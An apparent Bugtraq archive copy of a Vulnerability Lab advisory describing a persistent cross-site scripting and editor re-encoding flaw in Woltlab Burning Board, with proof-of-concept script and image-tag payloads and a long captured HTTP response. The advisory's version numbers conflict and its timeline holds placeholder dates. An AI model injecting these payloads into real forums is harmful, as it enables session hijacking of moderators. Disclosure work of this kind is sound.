[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Woltlab Burning Board 3.9.1 pl1 - Persistent Web Vulnerability & Editor Reverse Encoding Issue
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx
- Subject: Woltlab Burning Board 3.9.1 pl1 - Persistent Web Vulnerability & Editor Reverse Encoding Issue
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Fri, 11 Apr 2014 16:31:30 +0200
Document Title:
===============
Woltlab Burning Board 3.9.1 pl1 - Persistent Web Vulnerability & Editor Reverse
Encoding Issue
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1256
Video: http://www.vulnerability-lab.com/get_content.php?id=1257
Release Date:
=============
2014-04-11
Vulnerability Laboratory ID (VL-ID):
====================================
1256
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
WoltLab Burning Board ist eine von der WoltLab GmbH entwickelte, auf der
Scriptsprache PHP basierende und objektorientiert programmierte Forensoftware.
Im Gegensatz zu den Vorversionen wurde es unter Nutzung von PHP 5 komplett
objektorientiert programmiert und erzeugt Markup, das den aktuellen
Webstandards
XHTML 1.1 und CSS2 entspricht. Schwerpunkte der Entwicklung lagen bei der
Benutzung von semantischem HTML und Barrierefreiheit. Das Templatesystem wurde
in
der Syntax nun an Smarty angelehnt und bietet deutlich weiter gehende
Möglichkeiten als in Version 2. Architektonisch gliedert sich die Software ab
Version
3 in ein Framework mit dem Namen WoltLab Community Framework (WCF), das als
Grundlage für die Entwicklung von Endanwendungen dient, und die darauf
aufbauende
Endanwendung Burning Board 3. Die Quelltexte des Kerns des WCF steht unter der
Open-Source-Lizenz LGPL.
Version 3.1 des Burning Board, welche am 14. Oktober 2009 veröffentlicht wurde,
basiert auf der WCF-Version 1.1 und brachte viele Detailverbesserungen und ein
völlig überarbeitetes Benutzerprofil, welches nun durch Profil-Plugins wie etwa
Gästebuch, Galerie oder Blog, erweitert werden kann. Das am 6. März 2008
veröffentlichte kostenlose Burning Board Lite 2 ist keine Weiterentwicklung von
Burning Board Lite 1, sondern basiert auf dem WoltLab Community Framework und
Burning Board 3. Burning Board Lite 2 ist sowohl für kleinere Forenprojekte
gedacht, welche nicht den gesamten Funktionsumfang der Vollversion benötigen,
als
auch als produktiv einsetzbare Demo von Burning Board 3 anzusehen. Am 11.
November 2010 veröffentlichte Woltlab das Burning Board Lite 2.1. Es basiert
auf dem
Woltlab Community Framework 1.1 und bietet Funktionen, die bisher nur in
kostenpflichtigen Versionen vorhanden waren. Das sind das neue Benutzerprofil
und der
WYSIWYG-Editor aus Version 3.1, eine Überarbeitung des Skins, eine
Mitglieder-Suchfunktion, erweiterte Einstellungen für die Dateigröße sowie
PN-Versand.
(Copy of the Homepage: http://de.wikipedia.org/wiki/WoltLab_Burning_Board )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input
validation web vulnerability in the official Woltlab GmbH - Burning Board
v3.9.1. PL1 web-application
Vulnerability Disclosure Timeline:
==================================
2014-04-11: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2014-00-00: Vendor Notification (Woltlab GmbH Security Team)
2014-00-00: Vendor Response/Feedback (Woltlab GmbH Security Team)
2014-00-00: Vendor Fix/Patch (Woltlab GmbH Developer Team)
2014-00-00: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Woltlab GmbH
Product: Woltlab Burning Board - Forum Web Application 3.9.1 PL 1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the
official Woltlab GmbH Burning Board v3.0.9 pl1 web-application.
The issue allows remote attackers to bypass the encoding filter of the editor
to execute malicious persistent script codes on the application-side.
Remote attackers are able to include malicious script codes while creating a
new forum thread. Since the application fails to perform proper
input sanatization by a secure re-encoding, the injected payloads get executed
after an administrator or moderator reviews the post and tries
to `Edit` and or `Quote/MultiQuote` the same thread. The script code execution
occurs after an click of the img resource button of the WYSIWYG editor module.
The vulnerability affects the `mce_editor_0_codeview` module. The same
vulnerability also gets triggered if the moderator/administrator clicks
on the `Insert Image` button while in the editor mode. By clicking the img
button the short link which is marked get reverse encoded which results
in the execution of the injected script codes via POST.
Exploitation of the vulnerability requires a low privileged user account and
low user interaction by an administrator or moderator of the forum.
Successful exploitation results in persistent application-side phishing,
application-side redirects, application-side session hijacking attacks and
persistent manipulation of affected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] mce_editor_0_codeview
Vulnerable Parameter(s):
[+] form > postID
Affected Module(s):
[+] Quote & Multi Quote Post (Editor)
[+] Edit Post (Editor)
Affected Version(s):
[+] Burning Board 3.0.9 pl 1 (Sunrise)
[+] Community Framework Version - 1.0.11 pl 4
(Horizon)
Vulnerable Package(s):
[+] com.woltlab.wcf.form.message.wysiwyg
(1.0.10 pl 3 - Date:Mar 22nd 2010 - Author: WoltLab GmbH)
Proof of Concept (PoC):
=======================
The persistent bug and filter issue can be exploited by remote attackers with
low privileged forum application user account and
low user interaction by an administrator or moderator user account. For
security demonstration or to reproduce the vulnerability
follow the provided information and steps below to continue.
Scenario 1: Remote
1. A remote attacker includes a broken link with malicious script codes to
hijack the moderator or administrator session.
2. An moderator or administrator is reviewing the broken post and click on
quote or edit to review the original source to fix
3. In the same moment the administrator or moderator clicks the image source
edit button through the regular editor (non sourcecode view) the script codes
executes (application-side)
Scenario 2: Local
1. A local attacker opens a post and is able to inject own script codes, quotes
his own post and clicks the image edit button to execute the code.
2. He is also able to save the link and request the cookies by usage of the
affected form=PostEdit&postID parameters.
PoC:
\'"><sCrIpt><iframe%20src=x%20onload=confirm(2)></iframe>>TEST<h1>TESTing</h1></sCrIpT>
#
"><img onerror=prompt(/POC/)
src=x></img>\'"><sCrIpt><iframe%20src=x%20onload=confirm(2)></iframe>>TEST<h1>TESTing</h1></sCrIpT>
#
"><img onerror=prompt(/POC/) src=x></img>%20"><iframe
src=javascript:\u0061lert(/Test-Ateeq-Board/)></iframe>
--- Validation Problem Editor Output after the Reverse Encode [img button] ---
[img]x[/img]\'">
">[img]x[/img]" wcf_src="
\'">
"[img]
">[img]x[/img]\'">
">[img]x[/img]" alt="
sCrIpT>
"[img]
sCrIpT>
img>" title="
sCrIpT>
"[img]
sCrIpT>
img>" /> [quote='Ateeq Ur Rehman
Khan',index.php?page=Thread&postID=31#post31][url='asdasdsad']
adsasd[/url][/img]"[/quote]
HTTP Logs:
GET /forum/index.php?form=PostAdd&postID=23&action=quote HTTP/1.1
Host: vulnerability-db.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101
Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://vulnerability-db.com/forum/index.php?page=Thread&threadID=15
Cookie: wcf_cookieHash=[HIDDEN]; wcf_boardLastActivityTime=1397172274;
wcf_userID=[]; wcf_password=[HIDDEN]
Connection: keep-alive
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Apr 2014 10:46:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PleskLin
Content-Length: 69495
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml"; dir="ltr" xml:lang="en"><head>
<title>Reply - test 1 - TalkBox #337 - VULNERABILITY LABORATORY -
SECURITY RESEARCH FORUM </title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="content-script-type" content="text/javascript" />
<meta http-equiv="content-style-type" content="text/css" />
<meta name="description" content="advisory, vulnerabilities, vulnerability,
exploit, security, live, hack, zero day, bug, secure, hacking, research,
researcher, seals, bugs, security technics, exploits, exploit videos,
documents,
analyses, malware, attacker, attack, sec, releases, 0 day, analysts, exploiter,
release, bug bounty, reward" />
<meta name="keywords" content="advisory, vulnerabilities, vulnerability,
exploit, security, live, hack, zero day, bug, secure, hacking, research,
researcher, seals, bugs, security technics, exploits, exploit videos,
documents, analyses,
malware, attacker, attack, sec, releases, 0 day, analysts, exploiter, release,
bug bounty, reward" />
<meta name="robots" content="noindex,nofollow" />
<!-- wbb styles -->
<link rel="stylesheet" type="text/css" media="screen"
href="style/burningBoard.css" />
<!-- dynamic styles -->
<link rel="stylesheet" type="text/css" media="screen"
href="wcf/style/style-1.css" />
<!-- print styles -->
<link rel="stylesheet" type="text/css" media="print"
href="wcf/style/extra/print.css" />
<script type="text/javascript">
//<![CDATA[
var SID_ARG_2ND = '';
var RELATIVE_WCF_DIR = 'wcf/';
var RELATIVE_WBB_DIR = '';
//]]>
</script>
<!-- hack styles -->
<!--[if lt IE 7]>
<link rel="stylesheet" type="text/css" media="screen"
href="wcf/style/extra/ie6-fix.css" />
<style type="text/css">
#page { /* note: non-standard style-declaration */
_width:
expression(((document.body.clientWidth/screen.width)) < 0.7 ? "760px":"80%" );
}
</style>
<![endif]-->
<!--[if IE 7]>
<link rel="stylesheet" type="text/css" media="screen"
href="wcf/style/extra/ie7-fix.css" />
<![endif]-->
<script type="text/javascript" src="wcf/js/default.js"></script>
<script type="text/javascript" src="wcf/js/PopupMenuList.class.js"></script>
<script type="text/javascript" src="wcf/js/AjaxRequest.class.js"></script>
<script type="text/javascript"
src="wcf/js/TabbedPane.class.js"></script>
<script type="text/javascript"
src="wcf/js/ImageResizer.class.js"></script>
<script type="text/javascript" src="wcf/js/Wysiwyg.class.js"></script>
<script type="text/javascript">
//<![CDATA[
// language
var language = new Object();
language['undo.desc'] = "Undo";language['redo.desc'] = "Redo";
language['b.desc'] = "Bold";language['i.desc'] = "Italic";language['u.desc'] =
"Underline";language['s.desc'] = "Strike through";
language['toolbar.focus'] = "Select toolbar";
language['link.desc'] = "Insert link";language['link.insert.url'] = "Enter the
complete address of the link:";language['link.insert.url.optional']=
"Enter the complete address of the link
(optional):";language['link.insert.name'] = "Enter a linkname
(optional)";language['unlink.desc'] = "Remove link";language['insertText'] =
"Insert text to format (optional).";
language['textAlignLeft.desc'] = "Align left";language['textAlignCenter.desc']
= "Align center";language['textAlignRight.desc'] = "Align
right";language['textJustify.desc'] = "Justify";
language['bullist.desc'] = "Unordered list";language['numlist.desc'] = "Ordered
list";
language['cut.desc'] = "Cut";language['copy.desc'] =
"Copy";language['paste.desc'] = "Paste";
language['img.desc'] = "Insert image";language['image.insert'] = "Please enter
the URL of the image.";
language['color.desc'] = "Select font colour";language['fontsize.default'] =
"Font size";language['fontFamily.default'] = "Font family";
language['quotation.desc'] = "Insert quotes";language['quote.desc'] = "Insert
quotation";language['code.desc'] = "Insert code";
language['view.wysiwyg'] = "Editor";language['view.code'] = "Source code";
language['noFormElement'] = "Error: Could not find the target
element.";language['extraBBCodeNotValid'] = "Your input is not correct.";
// language direction
var languageDirection = "ltr";
// smileys
var smilies = new Object();
smilies[':)'] = new Array('wcf\/images\/smilies\/smile.png', 'smile');
smilies[':('] = new Array('wcf\/images\/smilies\/sad.png', 'sad');
smilies[';)'] = new Array('wcf\/images\/smilies\/wink.png', 'wink');
smilies[':P'] = new Array('wcf\/images\/smilies\/tongue.png', 'tongue');
smilies['8)'] = new Array('wcf\/images\/smilies\/cool.png', 'Cool');
smilies[':D'] = new Array('wcf\/images\/smilies\/biggrin.png',
'biggrin');
smilies[';('] = new Array('wcf\/images\/smilies\/crying.png', 'crying');
smilies[':rolleyes:'] = new Array('wcf\/images\/smilies\/rolleyes.png',
'rolleyes');
smilies[':huh:'] = new Array('wcf\/images\/smilies\/huh.png', 'Huh');
smilies[':S'] = new Array('wcf\/images\/smilies\/unsure.png', 'unsure');
smilies[':love:'] = new Array('wcf\/images\/smilies\/love.png', 'love');
smilies['X('] = new Array('wcf\/images\/smilies\/angry.png', 'angry');
smilies['8|'] = new Array('wcf\/images\/smilies\/blink.png', 'blink');
smilies['?('] = new Array('wcf\/images\/smilies\/confused.png',
'confused');
smilies[':cursing:'] = new Array('wcf\/images\/smilies\/cursing.png',
'cursing');
smilies[':|'] = new Array('wcf\/images\/smilies\/mellow.png', 'mellow');
smilies[':thumbdown:'] = new
Array('wcf\/images\/smilies\/thumbdown.png', 'thumbdown');
smilies[':thumbsup:'] = new Array('wcf\/images\/smilies\/thumbsup.png',
'thumbsup');
smilies[':thumbup:'] = new Array('wcf\/images\/smilies\/thumbup.png',
'thumbup');
smilies['8o'] = new Array('wcf\/images\/smilies\/w00t.png', 'w00t');
smilies[':pinch:'] = new Array('wcf\/images\/smilies\/pinch.png',
'pinch');
smilies[':sleeping:'] = new Array('wcf\/images\/smilies\/sleeping.png',
'sleeping');
smilies[':wacko:'] = new Array('wcf\/images\/smilies\/wacko.png',
'wacko');
smilies[':whistling:'] = new
Array('wcf\/images\/smilies\/whistling.png', 'whistling');
smilies[':evil:'] = new Array('wcf\/images\/smilies\/evil.png', 'evil');
smilies['^^'] = new Array('wcf\/images\/smilies\/squint.png', 'squint');
smilies[':?:'] = new Array('wcf\/images\/smilies\/question.png',
'question');
smilies[':!:'] = new Array('wcf\/images\/smilies\/attention.png',
'attention');
// bbcodes
var coreBBCodes = new Object();
var extraBBCodes = new Object();
var sourceCodes = new Object();
var tmpBBCode = { wysiwyg:1, bbCode:'b',
htmlOpen:'strong', htmlClose:'strong', icon:'fontStyleBoldM.png', sourceCode:0,
attributes:[] };
coreBBCodes['b'] = tmpBBCode;
language['b.title'] = "wcf.bbcode.b.title";
var tmpBBCode = { wysiwyg:1, bbCode:'i', htmlOpen:'em', htmlClose:'em',
icon:'fontStyleItalicM.png', sourceCode:0, attributes:[] };
coreBBCodes['i'] = tmpBBCode;
language['i.title'] = "wcf.bbcode.i.title";
var tmpBBCode = { wysiwyg:1, bbCode:'u', htmlOpen:'span
style="text-decoration: underline"', htmlClose:'span',
icon:'fontStyleUnderlineM.png', sourceCode:0, attributes:[] };
coreBBCodes['u'] = tmpBBCode;
language['u.title'] = "wcf.bbcode.u.title";
var tmpBBCode = { wysiwyg:1, bbCode:'s', htmlOpen:'span
style="text-decoration: line-through"', htmlClose:'span',
icon:'fontStyleStriketroughM.png', sourceCode:0, attributes:[] };
coreBBCodes['s'] = tmpBBCode;
language['s.title'] = "wcf.bbcode.s.title";
var tmpBBCode = { wysiwyg:0, bbCode:'sub', htmlOpen:'sub', htmlClose:'sub',
icon:'', sourceCode:0, attributes:[] };
extraBBCodes['sub'] = tmpBBCode;
language['sub.title'] = "wcf.bbcode.sub.title";
var tmpBBCode = { wysiwyg:0, bbCode:'sup', htmlOpen:'sup', htmlClose:'sup',
icon:'', sourceCode:0, attributes:[] };
extraBBCodes['sup'] = tmpBBCode;
language['sup.title'] = "wcf.bbcode.sup.title";
var tmpBBCode = { wysiwyg:0, bbCode:'email', htmlOpen:'a', htmlClose:'a',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'href="mailto:%s";',
validationPattern:'^[^\\s]+@[^\\s]+$', required:1
}] };
extraBBCodes['email'] = tmpBBCode;
language['email.title'] = "wcf.bbcode.email.title";
language['email.attribute1.promptText'] = "wcf.bbcode.email.promptText";
var tmpBBCode = { wysiwyg:1, bbCode:'color', htmlOpen:'span',
htmlClose:'span', icon:'fontColorPickerEmptyM.png', sourceCode:0, attributes:[{
attributeHTML:'style="color: %s"',
validationPattern:'^[0-9a-z#]+$', required:1 }] };
coreBBCodes['color'] = tmpBBCode;
language['color.title'] = "wcf.bbcode.color.title";
language['color.attribute1.promptText'] = "wcf.bbcode.color.promptText";
var tmpBBCode = { wysiwyg:1, bbCode:'size', htmlOpen:'span', htmlClose:'span',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'style="font-size: %dpt"',
validationPattern:'^([89]{1}|[1-3]{1}
[0-9]{1})$', required:1 }] };
coreBBCodes['size'] = tmpBBCode;
language['size.title'] = "wcf.bbcode.size.title";
language['size.attribute1.promptText'] = "wcf.bbcode.size.promptText";
var tmpBBCode = { wysiwyg:1, bbCode:'font', htmlOpen:'span', htmlClose:'span',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'style="font-family: %s"',
validationPattern:'^[^"\';}\\(\\)]*$',
required:1 }] };
coreBBCodes['font'] = tmpBBCode;
language['font.title'] = "wcf.bbcode.font.title";
language['font.attribute1.promptText'] = "wcf.bbcode.font.promptText";
var tmpBBCode = { wysiwyg:1, bbCode:'align', htmlOpen:'div', htmlClose:'div',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'style="text-align: %s"',
validationPattern:'^(left|right|center|
justify)$', required:1 }] };
coreBBCodes['align'] = tmpBBCode;
language['align.title'] = "wcf.bbcode.align.title";
language['align.attribute1.promptText'] = "wcf.bbcode.align.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'quote', htmlOpen:'', htmlClose:'',
icon:'quoteM.png', sourceCode:0, attributes:[{ attributeHTML:'',
validationPattern:'', required:0 }, { attributeHTML:'',
validationPattern:'', required:0 }] };
coreBBCodes['quote'] = tmpBBCode;
language['quote.title'] = "Quoted{if $quoteAuthor} from "{@$quoteAuthor}"{/if}";
language['quote.attribute1.promptText'] = "wcf.bbcode.quote.promptText";
language['quote.attribute2.promptText'] = "wcf.bbcode.quote.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'code', htmlOpen:'', htmlClose:'',
icon:'insertCodeM.png', sourceCode:1, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:0 }] };
coreBBCodes['code'] = tmpBBCode;
sourceCodes['code'] = 'code'; language['code.title'] = "Source code";
language['code.attribute1.promptText'] = "wcf.bbcode.code.promptText";
var tmpBBCode = { wysiwyg:1, bbCode:'img', htmlOpen:'img', htmlClose:'',
icon:'insertImageM.png', sourceCode:0, attributes:[{ attributeHTML:'src="%s"
class="resizeImage" alt=""',
validationPattern:'^[^?\\s]+$', required:1 }, { attributeHTML:'style="float:
%s"', validationPattern:'^(left|right)$', required:0 }] };
coreBBCodes['img'] = tmpBBCode;
language['img.title'] = "wcf.bbcode.img.title";
language['img.attribute1.promptText'] = "wcf.bbcode.img.promptText";
language['img.attribute2.promptText'] = "wcf.bbcode.img.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'url', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'^.+$',
required:1 }] };
coreBBCodes['url'] = tmpBBCode;
language['url.title'] = "wcf.bbcode.url.title";
language['url.attribute1.promptText'] = "wcf.bbcode.url.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'list', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'',
validationPattern:'^(1|a|none|circle|square|disc|decimal|lower-roman|
upper-roman|decimal-leading-zero|lower-greek|lower-latin|upper-latin|armenian|georgian)$',
required:0 }] };
coreBBCodes['list'] = tmpBBCode;
language['list.title'] = "wcf.bbcode.list.title";
language['list.attribute1.promptText'] = "wcf.bbcode.list.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'attach', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:1 }] };
extraBBCodes['attach'] = tmpBBCode;
language['attach.title'] = "wcf.bbcode.attach.title";
language['attach.attribute1.promptText'] = "wcf.bbcode.attach.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'tpl', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$',
required:0 }] };
extraBBCodes['tpl'] = tmpBBCode;
sourceCodes['tpl'] = 'tpl'; language['tpl.title'] = "Template
source code";
language['tpl.attribute1.promptText'] = "wcf.bbcode.tpl.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'xml', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$',
required:0 }] };
extraBBCodes['xml'] = tmpBBCode;
sourceCodes['xml'] = 'xml'; language['xml.title'] = "XML";
language['xml.attribute1.promptText'] = "wcf.bbcode.xml.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'html', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:1, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:0 }] };
extraBBCodes['html'] = tmpBBCode;
sourceCodes['html'] = 'html'; language['html.title'] = "HTML";
language['html.attribute1.promptText'] = "wcf.bbcode.html.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'css', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$',
required:0 }] };
extraBBCodes['css'] = tmpBBCode;
sourceCodes['css'] = 'css'; language['css.title'] = "Cascading
style sheet";
language['css.attribute1.promptText'] = "wcf.bbcode.css.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'mysql', htmlOpen:'', htmlClose:'',
icon:'insertMysqlM.png', sourceCode:1, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:0 }] };
extraBBCodes['mysql'] = tmpBBCode;
sourceCodes['mysql'] = 'mysql'; language['mysql.title'] = "MySQL
queries";
language['mysql.attribute1.promptText'] = "wcf.bbcode.mysql.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'java', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:1, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:0 }] };
extraBBCodes['java'] = tmpBBCode;
sourceCodes['java'] = 'java'; language['java.title'] = "Java source
code";
language['java.attribute1.promptText'] = "wcf.bbcode.java.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'php', htmlOpen:'', htmlClose:'',
icon:'insertPhpM.png', sourceCode:1, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:0 }] };
extraBBCodes['php'] = tmpBBCode;
sourceCodes['php'] = 'php'; language['php.title'] = "PHP Source
code";
language['php.attribute1.promptText'] = "wcf.bbcode.php.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'clipfish', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }] };
extraBBCodes['clipfish'] = tmpBBCode;
language['clipfish.title'] = "Clipfish video";
language['clipfish.attribute1.promptText'] = "wcf.bbcode.clipfish.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'googlevideo', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }] };
extraBBCodes['googlevideo'] = tmpBBCode;
language['googlevideo.title'] = "Google video";
language['googlevideo.attribute1.promptText'] =
"wcf.bbcode.googlevideo.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'myspace', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }] };
extraBBCodes['myspace'] = tmpBBCode;
language['myspace.title'] = "MySpace video";
language['myspace.attribute1.promptText'] = "wcf.bbcode.myspace.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'myvideo', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }, { attributeHTML:'',
validationPattern:'^(s|m|l|S|M|L)$', required:0 }] };
extraBBCodes['myvideo'] = tmpBBCode;
language['myvideo.title'] = "MyVideo video";
language['myvideo.attribute1.promptText'] = "wcf.bbcode.myvideo.promptText";
language['myvideo.attribute2.promptText'] = "wcf.bbcode.myvideo.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'youtube', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }, { attributeHTML:'',
validationPattern:'^wide$', required:0 }] };
extraBBCodes['youtube'] = tmpBBCode;
language['youtube.title'] = "YouTube video";
language['youtube.attribute1.promptText'] = "wcf.bbcode.youtube.promptText";
language['youtube.attribute2.promptText'] = "wcf.bbcode.youtube.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'sevenload', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }] };
extraBBCodes['sevenload'] = tmpBBCode;
language['sevenload.title'] = "Sevenload video";
language['sevenload.attribute1.promptText'] =
"wcf.bbcode.sevenload.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'js', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$',
required:0 }] };
extraBBCodes['js'] = tmpBBCode; sourceCodes['js'] =
'js'; language['js.title'] = "Javascript source code";
language['js.attribute1.promptText'] = "wcf.bbcode.js.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'c', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$',
required:0 }] };
extraBBCodes['c'] = tmpBBCode; sourceCodes['c'] = 'c';
language['c.title'] = "C/C++ Source code";
language['c.attribute1.promptText'] = "wcf.bbcode.c.promptText";
errorField = false;
// build editor. pass neccessary variables
tinyMCE.init({
// set active view flag (code or wysiwyg) ($editorIsActive)
(default:wysiwyg)
editorIsActive : 0,
// set available views (default: both views available)
editorEnableWysiwygView : 1,
editorEnableCodeView : 1,
// set some url vars
iconURL : "wcf/icon/",
imageURL : "wcf/icon/wysiwyg/",
blankHTML : "wcf/js/blank.htm",
cssFile : "wcf/style/style-1.css",
// set editor height var ($wysiwygHeight)
height: 200,
// set page default font color var
defaultPageFontColor: '#ccc'
});
//]]>
</script></head>
<body>
<div id="page">
<a id="top"></a>
<div id="userPanel" class="userPanel">
<p id="date">
<img src="wcf/icon/dateS.png" alt="" />
<span>Friday, April 11th 2014, 12:46pm UTC+2</span>
</p>
<p id="userNote">
Welcome <a href="index.php?page=User&userID=7">Ateeq Ur
Rehman Khan</a>. </p>
<div id="userMenu">
<ul>
<li><a
href="index.php?action=UserLogout&t=fc3551d52e1c22c37818f3ed0f5fedb4772f4188"><img
src="wcf/icon/logoutS.png" alt="" /> <span>Logout</span></a></li>
<li><a href="index.php?form=UserProfileEdit"><img src="wcf/icon/profileS.png"
alt="" /> <span>My Profile</span></a></li>
<li ><a href="index.php?page=PMList"><img src="wcf/icon/pmEmptyS.png"
alt="" /> <span>Private Messages</span></a></li>
</ul>
</div>
</div>
<div id="header" class="border">
<div id="search">
<form method="post" action="index.php?form=Search">
<div class="searchContainer">
<input type="text" tabindex="5" id="searchInput" class="inputText" name="q"
value="Enter search word" />
<input type="image" tabindex="6" id="searchSubmit" class="searchSubmit
inputImage" src="wcf/icon/submitS.png" alt="Submit" />
<input type="hidden" name="types[]" value="post" />
<script type="text/javascript">
//<![CDATA[
document.getElementById('searchInput').setAttribute('autocomplete',
'off');
document.getElementById('searchInput').onfocus = function() { if
(this.value == 'Enter search word') this.value=''; };
document.getElementById('searchInput').onblur = function() { if
(this.value == '') this.value = 'Enter search word'; };
document.getElementById('searchSubmit').ondblclick = function() {
window.location = 'index.php?form=Search'; };
popupMenuList.register("searchInput");
document.getElementById('searchInput').className += "
searchOptions";
//]]>
</script>
<div class="searchInputMenu">
<div class="hidden" id="searchInputMenu">
<div class="pageMenu smallFont">
<ul>
<li><a
href="index.php?form=Search&action=unread">Unread posts</a></li>
<li><a
href="index.php?form=Search&action=unreplied">Unreplied threads</a></li>
<li><a href="index.php?form=Search&action=24h">Threads
of the last 24 hours</a></li>
<li><a href="index.php?form=Search">Advanced Search</a></li>
</ul>
</div>
</div>
</div>
<noscript>
<p><a href="index.php?form=Search">Advanced Search</a></p>
</noscript>
</div>
</form>
</div>
<div id="logo">
<h1 class="pageTitle"><a
href="index.php?page=Index">VULNERABILITY LABORATORY - SECURITY RESEARCH
FORUM</a></h1>
</div>
<div id="mainMenu" class="mainMenu">
<div><ul><li class="firstActive"><a href="index.php?page=Index"
title="Forum"><img src="icon/indexM.png" alt="" />
<span>Forum</span></a></li><li><a href="index.php?page=MembersList"
title="Members"><img
src="wcf/icon/membersM.png" alt="" /> <span>Members</span></a></li><li><a
href="index.php?page=Help" title="Help"><img src="wcf/icon/helpM.png" alt="" />
<span>Help</span></a></li><li class="last"><a href="index.php?page=LegalNotice"
title="Legal Notice"><img src="wcf/icon/legalNoticeM.png" alt="" /> <span>Legal
Notice</span></a></li></ul>
</div>
</div> </div>
<div id="main">
<ul class="breadCrumbs">
<li><a href="index.php?page=Index"><img
src="icon/indexS.png" alt="" /> <span>VULNERABILITY LABORATORY - SECURITY
RESEARCH FORUM</span></a> »</li>
<li><a href="index.php?page=Board&boardID=22"><img
src="icon/categoryS.png" alt="" /> <span># Vulnerability Laboratory - Public
Communication Forums</span></a> »</li>
<li><a href="index.php?page=Board&boardID=23"><img
src="icon/boardS.png" alt="" /> <span>TalkBox #337</span></a> »</li>
<li><a href="index.php?page=Thread&threadID=15"><img
src="icon/threadS.png" alt="" /> <span>test 1</span></a> »</li>
</ul>
<div class="mainHeadline">
<img src="icon/postReplyL.png" alt="" />
<div class="headlineContainer">
<h2>Reply</h2>
</div>
</div>
<form enctype="multipart/form-data" method="post"
action="index.php?form=PostAdd&threadID=15">
<div class="border content">
<div class="container-1">
<fieldset>
<legend>Message information</legend>
<div class="formElement">
<div class="formFieldLabel">
<label for="subject">Subject</label>
</div>
<div class="formField">
<input type="text" class="inputText" id="subject"
name="subject" value="RE: test 1" tabindex="8" />
</div>
</div>
</fieldset>
<fieldset>
<legend>Message</legend>
<div class="formElement" id="editor">
<div class="formFieldLabel">
<label for="text">Message</label>
